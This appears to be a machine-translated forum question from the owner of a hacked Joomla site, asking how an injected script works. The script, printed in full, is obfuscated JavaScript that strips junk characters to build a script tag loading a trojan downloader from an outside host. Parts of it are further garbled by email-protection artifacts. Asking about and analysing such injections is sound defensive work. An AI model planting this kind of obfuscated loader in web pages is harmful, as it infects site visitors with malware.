Мой Joomla! сайт неоднократно взламывался. Кто-то, каким-то образом, сумел ввести следующий мусор в ключевые php-скрипты, но я имею в виду не говорить о настройке Joomla. Сайт не посещается много (иногда я боюсь, что я могу быть единственным посетителем этого сайта...), и мне все равно, что сайт будет работать и работать. В конце концов, я это обработаю.
Мой вопрос: как этот мусор работает? Я смотрю на это, и я просто не понимаю, как это может навредить? Он пытается загрузить файл PDF с именем ChangeLog.pdf, зараженный трояном, и после открытия будет заморозить ваш Acrobat и нанести ущерб вашему компьютеру. Как это делается, я не знаю, мне все равно. Но как следующий фрагмент script вызывает загрузку?
<script>/*Exception*/ document.write('<script src='+'h#^([email protected])((t$&@p#:)&/!$/)@d$y#^#[email protected]$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@[email protected]@([email protected]$p(.&@c&)@(o$m)).!$m$)[email protected]([email protected]()s&[email protected]&o$&(u#)$x&&^(i)[email protected]^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&[email protected]&^&l^$(l)&y$(#@[email protected]!((o#d&^.^#)r$#^u!!$:(#@&8#)([email protected]&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&[email protected]!&^m#&/&(s&$(o!f&[email protected]&o!!n)&i$&c!.#^^c)[email protected]@(([email protected]#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^[email protected]$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&[email protected](z(@)^[email protected])c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET обнаружил этот код как JS/TrojanDownloader.Agent.NRO trojan